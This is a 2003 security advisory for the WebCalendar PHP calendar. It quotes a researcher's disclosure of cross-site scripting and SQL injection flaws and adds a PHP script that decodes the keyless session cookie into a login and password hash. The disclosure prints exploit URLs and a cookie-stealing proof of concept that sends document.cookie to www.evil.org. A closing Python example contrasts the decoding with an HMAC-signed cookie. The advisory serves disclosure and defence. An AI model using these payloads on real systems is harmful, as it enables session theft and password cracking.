Category:   Application (Calendar)  >   WebCalendar
Vendors:   Knudsen, Craig
WebCalendar Input Validation Flaws in Multiple Variables Permit Cross-Site Scripting Attacks and Possibly SQL Injection Attacks
SecurityTracker Alert ID:  1007625
SecurityTracker URL:  http://securitytracker.com/id/1007625
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Sep 4 2003
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 0.9.42 and prior versions
Description:   Several input validation vulnerabilities were reported in WebCalendar. A remote user can conduct cross-site scripting attacks against calendar users. A remote user may also be able to inject SQL commands to be executed by the underlying database.

It is reported that the following files do not filter HTML code from user-supplied input in certain variables:

colors.php, week.php, day.php, month.php, week_details.php, view_l.php, view_m.php, view_t.php, view_v.php, view_w.php, week_details.php, and possibly others.

A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the WebCalendar software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>

http://[target]/webcalendar/week.php?user="><script>alert(document.cookie)</script>

It is also reported that a remote user can (via the cross-site scripting attacks, or via other methods) extract the target user's hashed password from the session ID contained in one of the target user's cookies, because the session ID is only a reversible, keyless encoding of the login name and password hash. The remote user can then attempt to crack the password hash offline. Information on extracting the hashed password from the session ID is available at:

http://nocon.darkflame.net/CSS/decode.txt

It is also reported that a remote user may be able to exploit the view_t.php, view_w.php, and view_v.php scripts to inject SQL commands by submitting the following type of URL:

http://[target]/webcalendar/view_m.php?id=additional sql command

According to the report, the 'login.php' script is also vulnerable if "magic quotes" is set to off in the PHP configuration file. Some demonstration exploit URLs are provided:

http://[target]/webcalendar/login.php?user='additional%20sqlcommand
http://[target]/webcalendar/login.php?password='additional%20sql%20command

The vendor has reportedly been notified.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the WebCalendar software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user may be able to inject SQL commands to be executed by the underlying database.

Solution:   No solution was available at the time of this entry.
Vendor URL:  webcalendar.sourceforge.net/
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Webcalendar <= 0.9.42 Cross Site Scripting Attacks and Potential SQL Injection Attack


Attachment: Wecalendar.txt

Webcalendar <= 0.9.42
http://webcalendar.sourceforge.net/

  WebCalendar is a PHP application used to maintain a calendar for one or more persons


Cross Site Scripting
========================================

Files (Maybe Others):
----------------------------
includes/js/colors.php

Code Snippet:
[...]
   window.opener.document.prefform.<?php echo $color?>.value= color;
[...]


Exploit: 
---------------------------
http://www.host.name/webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>


Files (Maybe Others):
-------------------------
week.php

Code Snippet:
[...]
  echo html_for_add_icon (  date ( "Ymd", $days[$d] ), $time_h, $time_m, $user );
[...]

Exploit:
--------------------
http://www.host.name/webcalendar/week.php?user="><script>alert(document.cookie)</script>


Files (Maybe Others):
-------------------------
day.php month.php week_details.php view_l.php view_m.php view_t.php view_v.php 
view_w.php week_details.php 

Code Snippet:
[...]
  echo $eventinfo;
[...]

Exploit:
----------------
http://www.host.name/webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>


POC:
-----------------
http://www.host.name/webcalendar/week.php?eventinfo=<script src=http://www.evil.org/evilcode.js</script>

"evilcode.js"
<--------------->
window.open('http://www.evil.org/cgi-bin/logcookie.cgi?'+document.cookie);
<--------------->

  We can then use the code provided in the files includes/functions.php and includes/validate.php
to decode the "webcalendar_session" hash taken from the cookie. PHP source to
decode the hash should be attached. 

From functions.php:
<----------------->
// Extract a user's name from a session id
// This is a lame attempt at security.  Otherwise, users would be
// able to edit their cookies.txt file and set the username in plain
// text.
<----------------->

Source: http://nocon.darkflame.net/CSS/decode.txt 
Demo:   http://nocon.darkflame.net/CSS/decode.php

   Example: 
       
     webcalendar_session=838ea889b26c9772819d709b826e7b8f926d;

     Hash: 838ea889b26c9772819d709b826e7b8f926d
     Decoded: 
        Login: demo
        Passw: Mn7ggQrGTEpi2 

  We can then run a standard unix password cracking program on "Mn7ggQrGTEpi2" 


Potential SQL Injection:
============================

  This seems to affect the view_t.php, view_w.php, view_v.php and maybe 
  others. 

http://www.host.name/webcalendar/view_m.php?id=additional sql command

   If "magic quotes" is set to off, then login.php is also vulnerable.

http://www.host.name/webcalendar/login.php?user='additional%20sqlcommand
http://www.host.name/webcalendar/login.php?password='additional%20sql%20command


----------------------------------------------------------------------------------------

Author Contacted on: Tue, 29 Jul 2003
Response: 

From: Craig Knudsen <cknudsen@cknudsen.com>
Subject: Re: Webcalendar Vulnerabilities

The source of most of these security issues is the use of global
variables, which seemed to be the way to back in PHP3.  I've tried to
maintain compatibility to PHP3, but I'm thinking it's not worth the
security risks at this point.  I will likely drop the use of global
variables in one of the next couple of releases.

In the mean time, I'll take a look at the issues you've listed here.  
 
Thanks.
Craig

Requested Update on: Tue, 2 Sep 2003
Response: NONE

----------------------------------------------------------------------------------------


Advisory: 
http://nocon.darkflame.net/CSS/Wecalendar.txt

Additional Resources:

- WWW Security White Paper
  http://www.discover.co.uk/www-secuirity.html
        
- Perl: http://www.developer.com/lang/article.php/861781
- PHP:  http://www.phpadvisory.com/articles/view.phtml?ID=5
- SQL Injection:
  http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
        
- HTML Code Injection and Cross-site scripting
  http://www.technicalinfo.net/papers/CSS.html
           
- Google is your friend ;)
  http://www.google.com


- nocon
Date: Wed Sep 3 2003
http://nocon.darkflame.net/


Attachment: webcaldecode.phps

<head>
    <title> Webcalendar Cookie Decode </title>
</head>

<form method=post action="<?php echo htmlspecialchars($_SERVER['PHP_SELF']); ?>">
<table width="200" border="0" cellspacing="1" cellpadding="0" bgcolor="#000000">
<tr><td>
   <table width="100%" border="0" cellspacing="2" cellpadding="2" bgcolor="#FFFFFF">
      <tr align="center">
        <td colspan="2">Webcalendar Cookie Decode <br> <a href=http://nocon.darkflame.net/>
        http://nocon.darkflame.net/</a> <br><br>
       </td>
      </tr>
     <tr>
    <td><strong>Hash</strong></td>  
    <td align="right"><input type="text" name="hash" size="60"></td>
   </tr>
<tr>
    <td>&nbsp;</td>
    <td align="center"> <input type="submit" value="Decode"></td>
</tr>
</table>
    </td>
</tr>
</table>
</form>

<?php

// Hash submitted through the form above. $HTTP_POST_VARS was removed in
// PHP 5.4; $_POST is the replacement.
$encoded_login = isset($_POST['hash']) ? $_POST['hash'] : '';

// Fixed per-position offsets used by WebCalendar's session-id encoding.
// The scheme is keyless, which is why the cookie can be decoded by anyone.
$offsets = array ( 31, 41, 59, 26, 54 );

// Convert one hex digit to its integer value (0 for anything unrecognised)
function hextoint ( $val ) {
  if ( empty ( $val ) )
    return 0;
  switch ( strtoupper ( $val ) ) {
    case "0": return 0;
    case "1": return 1;
    case "2": return 2;
    case "3": return 3;
    case "4": return 4;
    case "5": return 5;
    case "6": return 6;
    case "7": return 7;
    case "8": return 8;
    case "9": return 9;
    case "A": return 10;
    case "B": return 11;
    case "C": return 12;
    case "D": return 13;
    case "E": return 14;
    case "F": return 15;
  }
  return 0;
}

// Reverse the encoding: each hex byte pair minus the offset for its position
// (offsets cycle every five characters) gives back the original character.
function decode_string ( $instr ) {
  global $offsets;
  $orig = "";
  for ( $i = 0; $i < strlen ( $instr ); $i += 2 ) {
    $ch1 = substr ( $instr, $i, 1 );
    $ch2 = substr ( $instr, $i + 1, 1 );
    $val = hextoint ( $ch1 ) * 16 + hextoint ( $ch2 );
    $j = ( $i / 2 ) % count ( $offsets );
    $newval = $val - $offsets[$j] + 256;
    $newval %= 256;
    $dec_ch = chr ( $newval );
    $orig .= $dec_ch;
  }
  return $orig;
}

// The decoded string is "login|crypt(password)". split() was removed in
// PHP 7; explode() on the literal '|' does the same job here.
$login_pw = explode('|', decode_string ($encoded_login));
$login = isset($login_pw[0]) ? $login_pw[0] : '';
$cryptpw = isset($login_pw[1]) ? $login_pw[1] : '';

// Escape on output so a crafted hash cannot inject markup into this page
echo "<b> Login:</b> " . htmlspecialchars($login) . " <br>";
echo "<b> Passw:</b> " . htmlspecialchars($cryptpw) . " <br>";

?>

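As an added illustration (not part of the advisory above and not WebCalendar's own code), the following Python reproduces the keyless cookie decoding on the advisory's sample hash and contrasts it with a cookie bound to an HMAC under a server-side key, so that a leaked cookie carries no password material and cannot be re-labelled for another user. SERVER_KEY, issue_cookie and verify_cookie are names assumed for this example.

```python
import hashlib
import hmac
import secrets

# Per-position offsets of WebCalendar 0.9.42's session "encoding" (taken from
# the decode script in the advisory above).
OFFSETS = (31, 41, 59, 26, 54)


def decode_session(hexstr):
    """Reverse the keyless transform; yields 'login|crypt(password)'.

    No secret is involved, so whoever reads the cookie (for example through
    the cross-site scripting described above) also reads the password hash.
    """
    raw = bytes.fromhex(hexstr)
    return "".join(chr((b - OFFSETS[i % len(OFFSETS)]) % 256)
                   for i, b in enumerate(raw))


# Hardened replacement (an illustration, not WebCalendar's fix): the cookie
# carries only the login plus an HMAC computed under a key that never leaves
# the server. The tag cannot be recomputed for a different login without it.
SERVER_KEY = secrets.token_bytes(32)  # constructed here; load from config in practice


def issue_cookie(login, key=SERVER_KEY):
    tag = hmac.new(key, login.encode(), hashlib.sha256).hexdigest()
    return login + "|" + tag


def verify_cookie(cookie, key=SERVER_KEY):
    """Return the login if the tag checks out, otherwise None."""
    login, sep, tag = cookie.partition("|")
    if not sep:
        return None
    expected = hmac.new(key, login.encode(), hashlib.sha256).hexdigest()
    # Constant-time compare so the tag cannot be guessed byte by byte.
    return login if hmac.compare_digest(tag, expected) else None


if __name__ == "__main__":
    # Sample hash from the advisory's own example
    print(decode_session("838ea889b26c9772819d709b826e7b8f926d"))
    c = issue_cookie("demo")
    print(c, verify_cookie(c), verify_cookie(c.replace("demo", "admin")))
```

The HMAC tag stops forgery and keeps the password hash out of the cookie; it does not by itself stop replay of a stolen cookie, which needs an expiry or a server-side session store.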